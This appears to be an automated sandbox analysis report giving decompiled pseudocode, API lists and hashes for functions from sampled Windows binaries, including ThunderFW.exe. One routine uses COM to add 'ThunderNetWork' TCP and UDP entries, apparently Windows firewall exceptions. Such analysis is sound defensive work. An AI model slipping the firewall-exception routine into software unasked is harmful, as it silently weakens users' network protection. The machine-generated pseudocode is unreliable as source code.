Opcode ID: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
Instruction ID: 35274199d236effe9a648b535348c56afb13a0cf633c63e6ee0ccd6430c010a7
Opcode Fuzzy Hash: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
Instruction Fuzzy Hash: D80192B1D106599FDF10DFE9D88479EBBF4FB08319F10842AE815EA284DBB499098F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040196B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040196B(void* __eax, void* __ecx, intOrPtr* __esi) {
				intOrPtr _v8;
				void* __ebx;
				intOrPtr _t10;
				void* _t14;
				WINDOWPLACEMENT* _t15;
				void* _t18;
				struct HWND__* _t23;
				intOrPtr* _t24;

				_t24 = __esi;
				_t18 = __eax;
				_t1 = _t24 + 4; // 0x40d794
				_t10 =  *_t1;
				_v8 = _t10;
				if(_t10 == 0) {
					memset(__eax + 0x248, 0, 0x2c);
				} else {
					_t23 =  *(__eax + 0x208);
					if(_t23 != 0) {
						_t15 = __eax + 0x248;
						_t15->length = 0x2c;
						GetWindowPlacement(_t23, _t15);
					}
				}
				_t14 =  *((intOrPtr*)( *_t24 + 0xc))(L"WinPos", _t18 + 0x248, 0x2c);
				if(_v8 == 0) {
					_t14 = E004019D2(_t18);
				}
				return _t14;
			}

0x0040196b
0x00401970
0x00401972
0x00401972
0x00401977
0x0040197a
0x004019a7
0x0040197c
0x0040197c
0x00401984
0x00401986
0x0040198e
0x00401994
0x00401994
0x00401984
0x004019c1
0x004019c8
0x004019ca
0x004019ca
0x004019d1

APIs

GetWindowPlacement.USER32(?,?,00000002,?,?,0040B20B,?,?,?,00000002,?,?,?,?,?,00000000), ref: 00401994
memset.MSVCRT ref: 004019A7

Strings

WinPos, xrefs: 004019BA

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PlacementWindowmemset
String ID: WinPos
API String ID: 4036792311-2823255486
Opcode ID: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
Instruction ID: 309fedf9ece379f47234066dfb297f1f11f9bdd101b0f57d7b7a510f29a8e9ac
Opcode Fuzzy Hash: 81be9ea41e6d398efb68a6c6dc4070ed39b463af53e59a3c9cc3062c0f115d68
Instruction Fuzzy Hash: 3CF062B0610204EFEB54DF55C899FAE33E99F04700F54017AE9099F1D1EBB89D44C769

Uniqueness

Uniqueness Score: -1.00%

Function 00407170, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00407170(void* __ecx, void* __eflags, struct HINSTANCE__* _a4) {
				void _v8198;
				short _v8200;
				int _t11;
				int _t16;

				E0040E340(0x2004, __ecx);
				_t16 = 0;
				_v8200 = 0;
				memset( &_v8198, 0, 0x2000);
				do {
					_t11 = LoadStringW(_a4, _t16,  &_v8200, 0x1000);
					if(_t11 > 0) {
						_t11 = E00406E5E(_t16,  &_v8200);
					}
					_t16 = _t16 + 1;
				} while (_t16 <= 0xffff);
				return _t11;
			}

0x00407178
0x0040717e
0x0040718d
0x00407194
0x0040719c
0x004071ac
0x004071b4
0x004071be
0x004071c4
0x004071c5
0x004071c6
0x004071d0

APIs

memset.MSVCRT ref: 00407194
LoadStringW.USER32(00412E48,00000000,?,00001000), ref: 004071AC

Part of subcall function 00406E5E: memset.MSVCRT ref: 00406E71
Part of subcall function 00406E5E: _itow.MSVCRT ref: 00406E7F

Strings

;t@, xrefs: 00407170

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$LoadString_itow
String ID: ;t@
API String ID: 2363904170-3941608961
Opcode ID: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
Instruction ID: 51c9355171e471fb499396a2aa2e6012e16bb247b54c8a94724daa36fdc5b9b4
Opcode Fuzzy Hash: abd66195640579f6e500643e127a0019a6d222aabc7e30448b3f27de400d40d8
Instruction Fuzzy Hash: 5BF0A73290032829F724AA56DD4ABDB7B6CDF05754F0000B6BB0CF61D2D634AA50CBEE

Uniqueness

Uniqueness Score: -1.00%

Function 004073D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004073D0(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00405800(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x004073d0
0x004073d1
0x004073d9
0x004073e3
0x004073e5
0x004073e5
0x004073f6

APIs

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

wcsrchr.MSVCRT ref: 004073D9
wcscat.MSVCRT ref: 004073EF

Strings

_lng.ini, xrefs: 004073E9

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
Instruction ID: d66fa5373373d5564c67ff94d3685b1a514421eeb891155236f9d41770c1593b
Opcode Fuzzy Hash: ac25628e4bbd1f7f59230636c7e582e2e1885c094a405939c83156bbf3aedd80
Instruction Fuzzy Hash: AEC0125394561154E12132125C03B4F21448F06314F70003BFC06744C2ABFD6115C06F

Uniqueness

Uniqueness Score: -1.00%

Function 004075A6, Relevance: 5.1, APIs: 4, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004075A6(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t33;
				intOrPtr* _t42;

				_t42 = __esi;
				 *__esi = 0x410168;
				 *((intOrPtr*)(__esi + 0x2f0)) = 0;
				_t33 = E00405CF8(0x34c, __esi);
				_push(0x14);
				 *((intOrPtr*)(__esi + 0x33c)) = 0;
				 *((intOrPtr*)(__esi + 0x348)) = 0;
				 *((intOrPtr*)(__esi + 0x2dc)) = 0;
				 *((intOrPtr*)(__esi + 0x2a0)) = 0;
				 *((intOrPtr*)(__esi + 0x2f4)) = 0;
				 *((intOrPtr*)(__esi + 0x2f8)) = 0xfff;
				 *((intOrPtr*)(__esi + 0x20)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *((intOrPtr*)(__esi + 0x2a8)) = 0;
				 *((intOrPtr*)(__esi + 0x2ec)) = 1;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 8)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0xc)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t42 + 0x10)) = _t33;
				L0040E038();
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					 *((intOrPtr*)(_t33 + 0xc)) = 0;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					 *((intOrPtr*)(_t33 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t33 + 8)) = 0;
				}
				 *((intOrPtr*)(_t42 + 0x14)) = _t33;
				return _t42;
			}

0x004075a6
0x004075b0
0x004075b6
0x004075bc
0x004075c1
0x004075c3
0x004075c9
0x004075cf
0x004075d5
0x004075db
0x004075e1
0x004075eb
0x004075ee
0x004075f1
0x004075f7
0x00407601
0x0040760f
0x00407621
0x00407611
0x00407611
0x00407614
0x00407616
0x00407619
0x0040761c
0x0040761c
0x00407623
0x00407625
0x00407628
0x00407630
0x00407642
0x00407632
0x00407632
0x00407635
0x00407637
0x0040763a
0x0040763d
0x0040763d
0x00407644
0x00407646
0x00407649
0x00407651
0x00407663
0x00407653
0x00407653
0x00407656
0x00407658
0x0040765b
0x0040765e
0x0040765e
0x00407665
0x00407667
0x0040766a
0x00407672
0x00407684
0x00407674
0x00407674
0x00407677
0x00407679
0x0040767c
0x0040767f
0x0040767f
0x00407687
0x0040768d

APIs

Part of subcall function 00405CF8: memset.MSVCRT ref: 00405D06

??2@YAPAXI@Z.MSVCRT ref: 00407601
??2@YAPAXI@Z.MSVCRT ref: 00407628
??2@YAPAXI@Z.MSVCRT ref: 00407649
??2@YAPAXI@Z.MSVCRT ref: 0040766A

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
Instruction ID: 6ad8090dc912b32accdf13bb09e5540cd70d669e40ded14db292eecac2a9bd8b
Opcode Fuzzy Hash: c889cf0ef11d6ee6e19e236316b87eec8e7d4ceedb9811563d0e99fe09c66d75
Instruction Fuzzy Hash: 7F31B2B0945B018ED7648F2BC484A56FAE8BF90310F2589AFD15ADB2B1D7F99440CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00406264, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406264(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E0040562D(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E0040562D(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

0x0040626f
0x00406271
0x00406276
0x00406279
0x0040627c
0x0040627f
0x00406283
0x00406286
0x0040628a
0x0040628d
0x00406290
0x004062a0
0x00406292
0x00406294
0x00406294
0x004062a6
0x004062ac
0x004062b0
0x004062b3
0x004062c4
0x004062b5
0x004062b7
0x004062b7
0x004062db
0x004062e6
0x004062f3
0x004062f6
0x004062fd
0x00406303

APIs

wcslen.MSVCRT ref: 00406271
free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,75144E00,?,00000000), ref: 00406294

Part of subcall function 0040562D: malloc.MSVCRT ref: 00405649
Part of subcall function 0040562D: memcpy.MSVCRT ref: 00405661
Part of subcall function 0040562D: free.MSVCRT(00000000,00000000,?,00406343,00000002,?,00000000,?,0040655F,75144E00,?,00000000), ref: 0040566A

free.MSVCRT(?,00000000,?,00000001,?,?,?,004065A8,?,75144E00,?,00000000), ref: 004062B7
memcpy.MSVCRT ref: 004062DB

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
Instruction ID: 328e5c77b206eb01c5c4dd085cb03c2c4ac654035e51f3c9fb1ea2fb7f212fdc
Opcode Fuzzy Hash: 8efed790d319c7eb988e68133398513d2f98d8a3c3203aacdd794e8cb7bc8c6e
Instruction Fuzzy Hash: 3A21AEB1600704EFC730EF19D881C9AB7F9EF483247104A2EF856A7291D775B925CB58

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ThunderFW.exe PID: 7100 Parent PID: 6612 ThunderFW.exeCOMMON

Executed Functions

Function 00B11372, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
comCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00B11372(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr _t96;
				intOrPtr* _t97;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr* _t119;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t133;
				void* _t135;
				void* _t163;
				void* _t166;
				signed int _t167;
				intOrPtr* _t169;

				_t167 = 0;
				_v16 = 0x80004005;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v28 = E00B180F0(__edx, _a4);
				_v32 = E00B180F0(__edx, "ThunderNetWork");
				_t85 = E00B180F0(__edx, _a8);
				_v36 = _t85;
				__imp__CoInitializeEx(0, 2, _t166); // executed
				_v40 = _t85;
				if(_t85 == 0x80010106 || _t85 >= 0) {
					_t87 = E00B11058( &_v24,  &_v24);
					_v16 = _t87;
					if(_t87 >= _t167) {
						_t95 = _v24;
						_t96 =  *((intOrPtr*)( *_t95 + 0x48))(_t95,  &_v20);
						_v16 = _t96;
						if(_t96 >= _t167) {
							_t97 = _v24;
							_t98 =  *((intOrPtr*)( *_t97 + 0x1c))(_t97,  &_v12);
							_v16 = _t98;
							if(_t98 >= _t167) {
								if((_v12 & 0x00000004) != 0 && _v12 != 4) {
									_v12 = _v12 ^ 0x00000004;
								}
								_t169 = __imp__CoCreateInstance;
								_t100 =  *_t169(0xb1db2c, _t167, 1, 0xb1db3c,  &_v8, _t163, _t135); // executed
								_v16 = _t100;
								if(_t100 >= 0) {
									_t101 = _v8;
									 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v28);
									_t103 = _v8;
									 *((intOrPtr*)( *_t103 + 0x28))(_t103, _v32);
									_t105 = _v8;
									 *((intOrPtr*)( *_t105 + 0x30))(_t105, _v36);
									_t107 = _v8;
									 *((intOrPtr*)( *_t107 + 0x40))(_t107, 6);
									_t109 = _v8;
									 *((intOrPtr*)( *_t109 + 0x98))(_t109, _v12);
									_t111 = _v8;
									 *((intOrPtr*)( *_t111 + 0xa8))(_t111, 1);
									_t113 = _v8;
									 *((intOrPtr*)( *_t113 + 0x88))(_t113, 0xffffffff);
									_t115 = _v20;
									 *((intOrPtr*)( *_t115 + 0x20))(_t115, _v8);
									_t118 =  *_t169(0xb1db2c, 0, 1, 0xb1db3c,  &_v8);
									_v16 = _t118;
									if(_t118 >= 0) {
										_t119 = _v8;
										 *((intOrPtr*)( *_t119 + 0x20))(_t119, _v28);
										_t121 = _v8;
										 *((intOrPtr*)( *_t121 + 0x28))(_t121, _v32);
										_t123 = _v8;
										 *((intOrPtr*)( *_t123 + 0x30))(_t123, _v36);
										_t125 = _v8;
										 *((intOrPtr*)( *_t125 + 0x40))(_t125, 0x11);
										_t127 = _v8;
										 *((intOrPtr*)( *_t127 + 0x98))(_t127, _v12);
										_t129 = _v8;
										 *((intOrPtr*)( *_t129 + 0xa8))(_t129, 1);
										_t131 = _v8;
										 *((intOrPtr*)( *_t131 + 0x88))(_t131, 0xffffffff);
										_t133 = _v20;
										_v16 =  *((intOrPtr*)( *_t133 + 0x20))(_t133, _v8);
									}
								}
								_t167 = 0;
							}
						}
					}
				}
				_t88 = _v8;
				if(_t88 != _t167) {
					 *((intOrPtr*)( *_t88 + 8))(_t88);
				}
				_t89 = _v20;
				if(_t89 != _t167) {
					 *((intOrPtr*)( *_t89 + 8))(_t89);
				}
				_t90 = _v24;
				if(_t90 != _t167) {
					 *((intOrPtr*)( *_t90 + 8))(_t90);
				}
				if(_v40 >= _t167) {
					__imp__CoUninitialize(); // executed
				}
				return _v16;
			}

0x00b1137c
0x00b1137e
0x00b11385
0x00b11388
0x00b1138b
0x00b1138e
0x00b1139b
0x00b113a6
0x00b113a9
0x00b113b1
0x00b113b4
0x00b113ba
0x00b113c2
0x00b113d0
0x00b113d8
0x00b113db
0x00b113e1
0x00b113eb
0x00b113f0
0x00b113f3
0x00b113f9
0x00b11403
0x00b11408
0x00b1140b
0x00b11415
0x00b1141d
0x00b1141d
0x00b11430
0x00b1143c
0x00b1143e
0x00b11443
0x00b11449
0x00b11452
0x00b11455
0x00b1145e
0x00b11461
0x00b1146a
0x00b1146d
0x00b11475
0x00b11478
0x00b11481
0x00b11487
0x00b1148f
0x00b11495
0x00b1149d
0x00b114a3
0x00b114ac
0x00b114b9
0x00b114bb
0x00b114c0
0x00b114c2
0x00b114cb
0x00b114ce
0x00b114d7
0x00b114da
0x00b114e3
0x00b114e6
0x00b114ee
0x00b114f1
0x00b114fa
0x00b11500
0x00b11508
0x00b1150e
0x00b11516
0x00b1151c
0x00b11528
0x00b11528
0x00b114c0
0x00b1152c
0x00b1152e
0x00b1140b
0x00b113f3
0x00b113db
0x00b1152f
0x00b11534
0x00b11539
0x00b11539
0x00b1153c
0x00b11541
0x00b11546
0x00b11546
0x00b11549
0x00b1154e
0x00b11553
0x00b11553
0x00b1155a
0x00b1155c
0x00b1155c
0x00b11566

APIs

_com_util::ConvertStringToBSTR.COMSUPP ref: 00B11391
_com_util::ConvertStringToBSTR.COMSUPP ref: 00B1139E

Part of subcall function 00B180F0: lstrlenA.KERNEL32(?,101C184A,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B18137
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1814D
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00B11112,00000000), ref: 00B1815C
Part of subcall function 00B180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00B11112,00000000), ref: 00B181EB
Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221

_com_util::ConvertStringToBSTR.COMSUPP ref: 00B113A9

Part of subcall function 00B180F0: _malloc.LIBCMT ref: 00B181A1

CoInitializeEx.OLE32(00000000,00000002,80004005,ThunderNetWork,?), ref: 00B113B4
CoCreateInstance.OLE32(00B1DB2C,00000000,00000001,00B1DB3C,?), ref: 00B1143C
CoCreateInstance.OLE32(00B1DB2C,00000000,00000001,00B1DB3C,?), ref: 00B114B9
CoUninitialize.OLE32 ref: 00B1155C

Strings

ThunderNetWork, xrefs: 00B11396

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharCreateErrorInstanceLastMultiWide$AllocInitializeUninitialize_malloclstrlen
String ID: ThunderNetWork
API String ID: 3644708077-3075295172
Opcode ID: 892045051c611f2151a9e5a6e038b56655f8939a9983f96dbb376cde943440d9
Instruction ID: 65b69db05cfb02c8b9df6b6c31b8a5a093effce31166fb3bf39370530822e1b2
Opcode Fuzzy Hash: 892045051c611f2151a9e5a6e038b56655f8939a9983f96dbb376cde943440d9
Instruction Fuzzy Hash: 2571B575A00219EFCB00DFE4C888A9EBBBAFF49714F604499F506EB251CB359A81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B174CC, Relevance: 6.1, APIs: 4, Instructions: 93
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00B174CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				long _t23;
				long _t24;
				void* _t25;
				long _t31;
				signed int _t32;
				signed int _t33;
				signed int _t39;
				signed int _t45;
				long _t49;
				void* _t52;
				void* _t53;

				_push(0xc);
				_push(0xb1dec8);
				E00B13F70(__ebx, __edi, __esi);
				_t39 =  *(_t52 + 8);
				if(_t39 <= 0) {
					L4:
					_t49 = _t39 *  *(_t52 + 0xc);
					 *(_t52 + 8) = _t49;
					__eflags = _t49;
					if(_t49 == 0) {
						_t49 = 1;
						__eflags = 1;
					}
					do {
						_t38 = 0;
						 *(_t52 - 0x1c) = 0;
						__eflags = _t49 - 0xffffffe0;
						if(_t49 > 0xffffffe0) {
							L13:
							__eflags = _t38;
							if(_t38 != 0) {
								L21:
								_t21 = _t38;
								L22:
								return E00B13FB5(_t21);
							}
							__eflags =  *0xb20a20; // 0x0
							if(__eflags == 0) {
								__eflags = _t38;
								if(_t38 == 0) {
									_t23 =  *(_t52 + 0x10);
									__eflags = _t23;
									if(_t23 != 0) {
										 *_t23 = 0xc;
									}
								}
								goto L21;
							}
							goto L15;
						}
						__eflags =  *0xb20a98 - 3;
						if( *0xb20a98 != 3) {
							L11:
							__eflags = _t38;
							if(_t38 != 0) {
								goto L21;
							}
							L12:
							_t25 = RtlAllocateHeap( *0xb2093c, 8, _t49); // executed
							_t38 = _t25;
							goto L13;
						}
						_t49 = _t49 + 0x0000000f & 0xfffffff0;
						 *(_t52 + 0xc) = _t49;
						__eflags =  *(_t52 + 8) -  *0xb20a84; // 0x0
						if(__eflags > 0) {
							goto L11;
						}
						E00B13C3D(0, 4);
						 *((intOrPtr*)(_t52 - 4)) = 0;
						_push( *(_t52 + 8));
						 *(_t52 - 0x1c) = E00B16CFF();
						 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
						E00B175C8();
						_t38 =  *(_t52 - 0x1c);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L12;
						}
						E00B14E20(0, _t38, 0,  *(_t52 + 8));
						_t53 = _t53 + 0xc;
						goto L11;
						L15:
						_t24 = E00B145B5(_t49);
						__eflags = _t24;
					} while (_t24 != 0);
					_t31 =  *(_t52 + 0x10);
					__eflags = _t31;
					if(_t31 != 0) {
						 *_t31 = 0xc;
					}
					L3:
					_t21 = 0;
					goto L22;
				}
				_t32 = 0xffffffe0;
				_t33 = _t32 / _t39;
				_t45 = _t32 % _t39;
				asm("sbb eax, eax");
				_t58 = _t33 + 1;
				if(_t33 + 1 != 0) {
					goto L4;
				} else {
					 *((intOrPtr*)(E00B138CA(_t58))) = 0xc;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00B13862(_t45, 0, __esi);
					goto L3;
				}
			}

0x00b174cc
0x00b174ce
0x00b174d3
0x00b174d8
0x00b174df
0x00b1750f
0x00b17513
0x00b17515
0x00b17518
0x00b1751a
0x00b1751e
0x00b1751e
0x00b1751e
0x00b1751f
0x00b1751f
0x00b17521
0x00b17524
0x00b17527
0x00b17592
0x00b17592
0x00b17594
0x00b175e2
0x00b175e2
0x00b175e4
0x00b175e9
0x00b175e9
0x00b17596
0x00b1759c
0x00b175d1
0x00b175d3
0x00b175d5
0x00b175d8
0x00b175da
0x00b175dc
0x00b175dc
0x00b175da
0x00000000
0x00b175d3
0x00000000
0x00b1759c
0x00b17529
0x00b17530
0x00b1757d
0x00b1757d
0x00b1757f
0x00000000
0x00000000
0x00b17581
0x00b1758a
0x00b17590
0x00000000
0x00b17590
0x00b17535
0x00b17538
0x00b1753e
0x00b17544
0x00000000
0x00000000
0x00b17548
0x00b1754e
0x00b17551
0x00b1755a
0x00b1755d
0x00b17564
0x00b17569
0x00b1756c
0x00b1756e
0x00000000
0x00000000
0x00b17575
0x00b1757a
0x00000000
0x00b1759e
0x00b1759f
0x00b175a5
0x00b175a5
0x00b175ad
0x00b175b0
0x00b175b2
0x00b175b8
0x00b175b8
0x00b17508
0x00b17508
0x00000000
0x00b17508
0x00b174e3
0x00b174e6
0x00b174e6
0x00b174eb
0x00b174ed
0x00b174ee
0x00000000
0x00b174f0
0x00b174f5
0x00b174fb
0x00b174fc
0x00b174fd
0x00b174fe
0x00b174ff
0x00b17500
0x00000000
0x00b17505

APIs

__lock.LIBCMT ref: 00B17548
___sbh_alloc_block.LIBCMT ref: 00B17554
_memset.LIBCMT ref: 00B17575
RtlAllocateHeap.NTDLL(00000008,?,00B1DEC8,0000000C,00B15589,00000000,?,00000000,00000000,00000000,?,00B1334F,00000001,00000214,?,00000000), ref: 00B1758A

Part of subcall function 00B138CA: __getptd_noexit.LIBCMT ref: 00B138CA

Part of subcall function 00B13862: __decode_pointer.LIBCMT ref: 00B1386D

Memory Dump Source

Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
String ID:
API String ID: 3771094184-0
Opcode ID: 9d963ad86b5577467971d14249390fc488db3dc5f6342ae86f38706887203b62
Instruction ID: ea10fec832df753535bc78209039c8abdfb884b4dbdf2b79fa67241099cff08f
Opcode Fuzzy Hash: 9d963ad86b5577467971d14249390fc488db3dc5f6342ae86f38706887203b62
Instruction Fuzzy Hash: 3E2191719886059BCB21AF68CC819DD7BF3FB65760BE486A5F8169B191DF308AC18B40

Uniqueness

Uniqueness Score: -1.00%

Function 00B12087, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B12087(int _a4) {

				E00B1205C(_a4);
				ExitProcess(_a4);
			}

0x00b1208f
0x00b12098

APIs

___crtCorExitProcess.LIBCMT ref: 00B1208F

